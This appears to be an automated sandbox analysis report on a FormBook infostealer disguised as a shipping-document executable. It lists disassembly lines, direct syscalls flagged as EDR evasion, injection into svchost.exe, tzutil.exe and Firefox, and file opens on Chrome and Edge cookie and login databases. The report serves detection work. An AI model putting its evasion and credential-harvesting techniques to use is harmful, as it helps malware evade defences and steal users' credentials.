                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]1_2_03D04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]1_2_03C68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]1_2_03C86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]1_2_03CDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]1_2_03CBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]1_2_03C6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]1_2_03C5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]1_2_03CC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]1_2_03C649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03CFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]1_2_03CBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]1_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]1_2_03CB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h]1_2_03D04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]1_2_03CBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]1_2_03CBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]1_2_03CB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]1_2_03CC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03C5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h]1_2_03D008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03CFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]1_2_03C30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]1_2_03CBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]1_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]1_2_03C60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]1_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]1_2_03CBE872
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_009880A9
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095A124 SetUnhandledExceptionFilter,0_2_0095A124
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0095A155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread register set: target process: 5924Jump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30C3008Jump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009887B1 LogonUserW,0_2_009887B1
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00933B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00933B3A
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_009348D7
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00994C27 mouse_event,0_2_00994C27
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"Jump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00987CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00987CAF
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0098874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0098874B
                Source: DRAFT COPY BL, CI & PL.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: DRAFT COPY BL, CI & PL.exe, oFlOzErifOVgUf.exe, 00000005.00000000.2145491716.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000002.3521137907.00000000017B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: oFlOzErifOVgUf.exe, 00000005.00000000.2145491716.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000002.3521137907.00000000017B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: oFlOzErifOVgUf.exe, 00000005.00000000.2145491716.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000002.3521137907.00000000017B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: oFlOzErifOVgUf.exe, 00000005.00000000.2145491716.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000002.3521137907.00000000017B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095862B cpuid 0_2_0095862B
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00964E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00964E87
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00971E06 GetUserNameW,0_2_00971E06
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00963F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00963F3A
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009349A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3520903347.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221199653.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3520852127.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
